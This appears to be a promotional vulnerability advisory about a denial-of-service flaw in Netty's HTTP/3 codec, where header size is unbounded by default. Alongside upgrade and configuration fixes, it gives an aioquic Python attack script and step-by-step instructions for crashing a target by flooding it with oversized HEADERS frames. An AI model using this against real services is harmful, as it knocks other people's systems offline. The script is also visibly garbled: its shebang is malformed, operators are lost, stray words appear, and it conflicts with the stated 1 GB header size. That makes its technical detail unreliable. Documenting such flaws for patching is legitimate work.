Listen to this Post
The vulnerability resides in the default configuration of Http3ConnectionHandler. When a peer does not explicitly set HTTP3_SETTINGS_MAX_FIELD_SECTION_SIZE, Netty falls back to an unbounded limit (contrary to HTTP/1.1 and HTTP/2 where it enforces an 8192-byte limit). This insecure default allows an attacker to send an enormous number of headers within a single HTTP/3 connection, causing uncontrolled memory allocation and eventually an OutOfMemoryError, leading to denial of service. Because many developers rely on Netty’s default setup, applications using the HTTP/3 codec without manual configuration are left vulnerable. The issue exists in the `maxHeaderListSize` passed through Http3FrameCodecnewFactory. Malicious clients or servers can exploit this by continuously streaming crafted HEADERS frames, exhausting system memory and crashing the application.
DailyCVE Form:
Platform: Netty HTTP/3 Codec
Version: 4.2.0.Final–4.2.14.Final
Vulnerability: Unbounded header limit
Severity: High (DoS)
date: 2026‑06‑08
Prediction: Patch available (4.2.15.Final)
What Undercode Say:
Check affected version (Maven dependency)
mvn dependency:tree | grep netty-codec-http3
Simulate attack: send huge HEADERS frame (Python with aioquic)
!/usr/bin/env python3
from aioquic.asyncio import connect
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.quic.configuration import QuicConfiguration
async def dos(target):
config = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
async with connect(target, 443, configuration=config) as conn:
h3 = H3Connection(conn)
h3.send_headers(stream_id=1, headers=[("x-fake", "a"106)]) oversized
await conn.wait_closed()
Exploit:
- Establish a single HTTP/3 connection to the target.
- Send a `HEADERS` frame containing a massive header field (e.g., 1 GB claimed length).
- Repeat step 2 rapidly within the same connection.
- The server allocates memory for each header without checking size, triggering `OutOfMemoryError` and process crash.
Protection:
- Upgrade to Netty 4.2.15.Final or later:
`mvn versions:use-latest-versions -Dincludes=io.netty:netty-codec-http3`
- If patching impossible, manually set a strict limit via
Http3Settings:Http3Settings settings = Http3Settings.initialSettings() .maxFieldSectionSize(8192);
- Restrict network access to trusted sources only, or temporarily disable HTTP/3 support.
Impact:
- Denial of Service – remote, unauthenticated attacker can crash any Netty HTTP/3 service using default configuration.
- No privilege escalation; only availability is affected.
- Common in cloud‑native apps, API gateways, or any service relying on Netty for HTTP/3.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
